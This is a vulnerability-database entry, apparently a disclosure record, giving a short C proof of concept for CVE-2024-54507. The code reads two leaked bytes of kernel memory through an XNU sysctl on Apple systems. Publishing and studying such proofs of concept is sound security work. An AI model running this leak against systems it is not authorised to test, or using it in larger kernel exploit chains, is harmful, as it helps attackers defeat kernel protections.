Proof Of Concept
Created on 2025-01-24 06:21, updated on 2025-01-24 06:32, by Cédric Bonhomme

// ravi (@0xjprx)
// 2-byte kernel infoleak, introduced in xnu-11215.1.10.
// gcc SUSCTL.c -o susctl
// ./susctl
#include <stdint.h>
#include <stdio.h>
#include <sys/sysctl.h>

void leak(void) {
    // Zero the 8-byte buffer so any non-zero upper bytes came from the kernel.
    uint64_t val = 0;
    size_t len = sizeof(val);
    if (sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0) != 0) {
        perror("sysctlbyname");
        return;
    }
    // Bytes 2 and 3 of the returned value are the two leaked bytes.
    printf("leaked: 0x%llX 0x%llX\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);
}

int main(void) {
    leak();
    return 0;
}

from https://github.com/jprx/CVE-2024-54507
Meta
[
  {
    "ref": [
      "https://github.com/jprx/CVE-2024-54507",
      "https://jprx.io/cve-2024-54507/"
    ],
    "tags": [
      "vulnerability:exploitability=documented",
      "vulnerability:information=PoC"
    ]
  }
]